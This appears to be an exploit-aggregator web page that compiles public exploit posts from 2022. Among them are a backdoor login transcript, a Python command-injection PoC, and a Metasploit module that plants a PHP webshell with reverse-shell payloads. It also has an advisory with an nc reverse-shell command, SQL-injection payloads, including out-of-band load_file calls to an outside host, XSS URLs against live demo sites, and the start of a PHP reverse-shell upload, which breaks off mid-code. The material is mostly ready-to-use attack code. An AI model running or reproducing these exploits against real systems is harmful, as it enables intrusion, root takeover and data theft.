Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Redkod.d Vulnerability: Weak Hardcoded Credentials Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file. Family: Redkod Type: PE32 MD5: bb309bdd071d5733efefe940a89fcbe8 Vuln ID: MVID-2022-0649 Disclosure: 10/16/2022 Exploit/PoC: C:\>nc64.exe x.x.x.x 4820 =========================================================== = RedKod Backdoor 1.0 = = By R-e-D = = http://www.redkod.com = = r-e-d@redkod.com = =========================================================== Password: redkod RBackdoor# exec calc msg: Execution effectuee avec succes RBackdoor# setpass malvuln RBackdoor# help COMMAND HELP: > Shell Commands : CD Permet de changer de repertoire courant CLEAR Efface le buffer de la console COPY Permet de copier un fichier DEL Permet d'effacer un ou plusieurs fichier DIR Permet de lister le contenu d'un repertoire FIND Recherche un fichier a travers le path HELP Affiche cette aide LS Permet de lister le contenu d'un repertoire MD Permet de creer un repertoire MOVE Permet de deplacer un fichier ou un repertoire REN Permet de renommer un fichier PWD Permet de recuperer le repertoire courant RMDIR Permet d'effacer un repertoire SHELL Permet d'executer toute commande DOS sur le systeme cible > Informations Commands : CLIP Permet de recuperer le contenu du presse papier DISKINFO Permet de recuperer des informations sur les disques durs GETGROUPS Permet de recuperer des informations sur les groupes, les users, les SID :) GETPROCESS Recupere et affiche la liste des processus actifs GETSERVICES Permet d'afficher les services NT presents sur une machine local ou distante LISTEVENT Permet de lister les journaux du eventlog NETSHARE Permer d'afficher les ressources partager de la machine local ou d'u ne machine distante ENUMSERVER Permet d'afficher les servers appartenant au domaine SYSINFO Permet de recuperer des informations sur le systeme cible TIME Affiche l'heure et la date du systeme distant UPTIME Permet d'afficher depuis combien de temps le systeme fonctionne USERINFO Permet d'obtenir des informations sur un utilisateur VERSION Affiche la version de RBackdoor WHOAMI Permet de recuperer l'utilisateur logge sur la machine > Interactions Commands : ADDEVENT Permet d'ajouter un evenement dans l'eventlog ADDSHARE Permet d'ajouter une ressource partagee BEEP Fait beeper le haut parleur interne CLEARLOG Permet d'effacer un journal complet de l'eventlog DELSERVICE Permet de supprimer un service present DELSHARE Permet de retirer une ressource partagee EXEC Permet d'executer une commande sur le systeme cible HEXEC Permet d'executer une commande tout en cachant sa sortie LOGOFF Permet de fermer la session de l'utilisateur courant KILLPROCESS Permet de killer un processus MOUSE Permet de placer le curseur de la souris au coordonnees x et y voulues MSGBOX Permet d'envoyer une boite de dialogue au systeme cible avec message personalise RCHAT Permet d'etablir une communication ecrite avec une personne etant pr esent sur le pc distant REBOOT Permet de redemarrer la machine SCREENSHOT Permet de prendre un screenshot du bureau de la machine distante SENDKEY Permet d'emuler la pression d'une touche du clavier SETNAME Change le nom NetBios du serveur STARTSERVICE Permet de demarrer un servive present sur la machine serveur STOPSERVICE Permet de stopper un service present et demarrer > Administration of RBackdoor Commands : EXIT Permet de fermer la connection a la backdoor tout en laissant la backdoor active KILL Permet de desactiver ou de reactiver la backdoor OPEN Creer un nouveau processus de RBackdoor sur un autre port SETPASS Permet de modifier le pass associe a la backdoor > RBackdoor Tools : FGET Permet de recuperer un fichier sur un serveur FTP FPUT Permet d'uploader un fichier sur un serveur FTP MAIL Permet d'envoyer un mail, etc... NETPATCH Rootkit permettant de patcher netstat.exe pour cacher RBackdoor RCRYPT Permet de crypter ou de decrypter un fichier RPATCH Permet de patcher le systeme pour effacer rbackdoor RSHELL Permet de lancer un vrai shell DOS SCAN Permet de scanner les ports d'une hote distante TELNET Permet de se connecter a une hote distante (TCP Protocol Only) VIEW Permet de lire le contenu d'un fichier WGET Recupere et d'affiche le contenu d'un fichier heberge sur un serveur http WRITE Permet d'ecrire directement dans un fichier msg: Tapez help <command> pour des informations plus precises sur la commande voulue RBackdoor# rshell ATTENTION!! Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable ! Microsoft Windows [Version 10.0.16299.309] (c) 2017 Microsoft Corporation. All rights reserved. C:\dump>whoami whoami desktop-2c4jqho\victim C:\dump>net user hyp3rlinx 666 /add net user hyp3rlinx 666 /add The command completed successfully. Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>#!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The application suffers from an OS command injection vulnerability. # This can be exploited to execute arbitrary commands with root privileges. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5717 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php # # # 24.09.2022 # import requests import re,sys #test case 001 #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT #test case 004 #http://ip:8008/?site=about&name=blind&file=$(id) #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory #test case 005 #http://ip:8008/?site=about&name=blind&file=`id` #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory if len(sys.argv) < 3: print('MiniDVBLinux 5.4 Command Injection PoC') print('Usage: ./mldhd_root2.py [url] [cmd]') sys.exit(17) else: url = sys.argv[1] cmd = sys.argv[2] req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')') outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group() print(outz.replace('<pre>','').replace('</pre>','')) </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root', 'Description' => %q{ pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected. }, 'Author' => [ 'IHTeam', # discovery 'jheysel-r7' # module ], 'References' => [ [ 'CVE', '2022-31814' ], [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/'] ], 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Privileged' => false, 'Arch' => [ ARCH_CMD ], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' } } ], [ 'BSD Dropper', { 'Platform' => 'bsd', 'Arch' => [ARCH_X64], 'Type' => :bsd_dropper, 'CmdStagerFlavor' => [ 'curl' ], 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' } } ] ], 'DefaultTarget' => 1, 'DisclosureDate' => '2022-09-05', 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Notes' => { 'Stability' => [ CRASH_SERVICE_DOWN ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION, ] } ) ) register_options( [ OptString.new('WEBSHELL_NAME', [ false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil ]) ] ) end def upload_shell print_status 'Uploading shell...' if datastore['WEBSHELL_NAME'].blank? @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php" else @webshell_name = "#{datastore['WEBSHELL_NAME']}.php" end @parameter_name = Rex::Text.rand_text_alpha(4..12) print_status("Webshell name is: #{@webshell_name}") web_shell_contents = <<~EOF <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));'); EOF encoded_php = web_shell_contents.unpack('H*')[0].upcase send_request_raw( 'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'), 'headers' => { 'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '" } ) sleep datastore['WfsDelay'] register_file_for_cleanup("/usr/local/www/#{@webshell_name}") end def check upload_shell check_resp = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"), 'vars_post' => { @parameter_name.to_s => 'id' } ) return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)') Exploit::CheckCode::Vulnerable end def execute_command(cmd, _opts = {}) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, @webshell_name), 'headers' => { 'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8' }, 'vars_post' => { @parameter_name.to_s => cmd } }) end def exploit upload_shell unless datastore['AutoCheck'] print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :bsd_dropper execute_cmdstager end end end </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Webtribute GmbH - courts-reservation.ch │ │ Software : Joomla OSG Courts Reservation 1.4.9 │ │ Vuln Type: SQL Injection │ │ Method : GET │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise │ │ │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /en/table-views/tab-view/booking GET parameter 'date' is vulnerable --- Parameter: date (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: rid=17&tsid=16&date=2022-10-12" AND (SELECT 6041 FROM(SELECT COUNT(*),CONCAT(0x716b7a7671,(SELECT (ELT(6041=6041,1))),0x7170766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fmfh&wd=3 --- [+] Starting the Attack [INFO] the back-end DBMS is MySQL web application technology: Nginx back-end DBMS: MySQL >= 5.0 (MariaDB fork) [INFO] fetching current database current database: '***_osg_courts_demo' [-] Done </code></pre>

<pre><code>CyberDanube Security Research 20221009-0 ------------------------------------------------------------------------------- title| Authenticated Command Injection product| Intelbras WiFiber 120AC inMesh vulnerable version| 1.1-220216 fixed version| 1-1-220826 CVE number| impact| High homepage| https://www.intelbras.com found| 2022-08-01 by| T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s were marked by the consolidation of the company in the telecommunications segment and we became leaders in the PABX and telephone terminals segment. The turn of the millennium represented the search for greater connection and proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC. We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our DNA, increasingly present in our daily lives. And it was only possible to write a story so full of achievements because employees, partners and customers were close and believed in us." Source: https://www.intelbras.com/en/institutional/who-we-are Vulnerable versions ------------------------------------------------------------------------------- WiFiber 120AC inMesh / 1.1-220216 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can be done by an attacker. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection The web server is prone to an authenticated command injection via POST parameters. The following proof-of-concept shows how to inject the command "ls /" to the system which gets executed in the background: =============================================================================== POST /boaform/formPing6 HTTP/1.1 Host: 192.168.3.147 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 87 Origin: http://192.168.3.147 Connection: close Referer: http://192.168.3.147/ping6.asp Upgrade-Insecure-Requests: 1 pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 =============================================================================== The following commands can be used to open a reverse shell: "rm -f /tmp/f" "mkfifo /tmp/f" "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f" Those commands were sent via a crafted POST request: =============================================================================== POST /boaform/formTracert HTTP/1.1 Host: 192.168.3.147 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 255 Origin: http://192.168.3.147 Connection: close Referer: http://192.168.3.147/tracert.asp Upgrade-Insecure-Requests: 1 proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 =============================================================================== The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Update to firmware version 1-1-220826. https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Intelbras customers to upgrade the firmware to the latest version available. Contact Timeline ------------------------------------------------------------------------------- 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br. 2022-08-03: Request from Intelbras to send the advisory to csirt@intelbras.com.br; Sent the advisory to this address. 2022-08-30: Asked for status update; Vendor answered that the new firmware version has been released the day before. Set the disclosure date to 2022-10-03 (60 days policy). 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues. 2022-10-09: Coordinated disclosure of advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF T. Weber / @2022 </code></pre>

<pre><code>The online-shopping-system-advanced-1.0 suffers from multiple SQLi The attacker can steal all information from the database of this system. Status: CRITICAL [+] Exploit: ```MYSQL Parameter: cid (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' OR NOT 4084=4084 AND 'icSi'='icSi Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT (ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL# ``` -------------------------------------------------------------------------------------------- ```MYSQL Parameter: password (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on ```` -------------------------------------------------------------------------------------------- ```MYSQL ``` ## And more: ```txt [1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]] [1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]] [1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php [password parameter]] [1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]] [1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]] [1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php [email parameter]] [1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name parameter]] ``` PoC: https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable Crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : wordpress.org/plugins/ecommerce-product-catalog/ │ │ Vendor : impleCode - implecode.com │ │ Software : WordPress eCommerce Product Catalog 3.0.70 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ URL parameter 'product_category' is vulnerable to XSS Path: /product-category/clothing/sunglasses/men/ https://demo.implecode.com/product-category/clothing/sunglasses/men/?product_category=40&gr0ln%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ewop2e=1 [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : ClickFWD LLC. - jreviews.com │ │ Software : WordPress JReviews 4.1.5 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ URL parameter 'listview' is vulnerable to XSS Path: /top-user-rated-listings https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&qrrwx%22%3e%3cscript%3ealert(1)%3c%2fscript%3et16n9=1 URL parameter 'format' is vulnerable to XSS Path: /advanced-search/search-results https://wp-demo.jreviews.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&mzh9g%22%3e%3cscript%3ealert(1)%3c%2fscript%3ei8emo=1 [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable Crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : e4j Extensions for Joomla - extensionsforjoomla.com │ │ Software : Joomla Vik Rent Car 1.14 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ parameter 'returnplace' is vulnerable to XSS Path: index.php/en/search-your-car https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=l2cno%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efobrc&task=showprc&Itemid=104&categories=2&goon=Continue parameter 'categories' is vulnerable to XSS Path: index.php/en/search-your-car https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=3&task=showprc&Itemid=104&categories=o41bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eml8z0&goon=Continue [-] Done </code></pre>

<pre><code># Exploit Title: Web Based Student Clearance 1.0 - Unrestricted File Upload leads to Remote Code Execution (Authenticated) # Date: 08-10-2022 # Exploit Author: Akash Pandey ( L3V1ATH0N ) # Vendor Homepage: https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=15627&title=Web-Based+Student+Clearance+System+in+PHP+Free+Source+Code # Version: v1.0 # Tested on: Windows, XAMPP, Kali Linux # CVE : ----- POC ----- Note : The reverse shell below is for Windows based PHP reverse shell. If the target host is using Linux then the Linux based PHP reverse shell must be used. --------------- Request : URL - http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php ========= POST /student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php HTTP/1.1 Host: 192.168.1.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------71268058833541201443517047173 Content-Length: 6864 Origin: http://192.168.1.12 Connection: close Referer: http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm Upgrade-Insecure-Requests: 1 -----------------------------71268058833541201443517047173 Content-Disposition: form-data; name="userImage"; filename="shell.php" Content-Type: application/x-php <?php header('Content-type: text/plain'); $ip = "192.168.1.26"; //change this $port = "80"; //change this $payload = 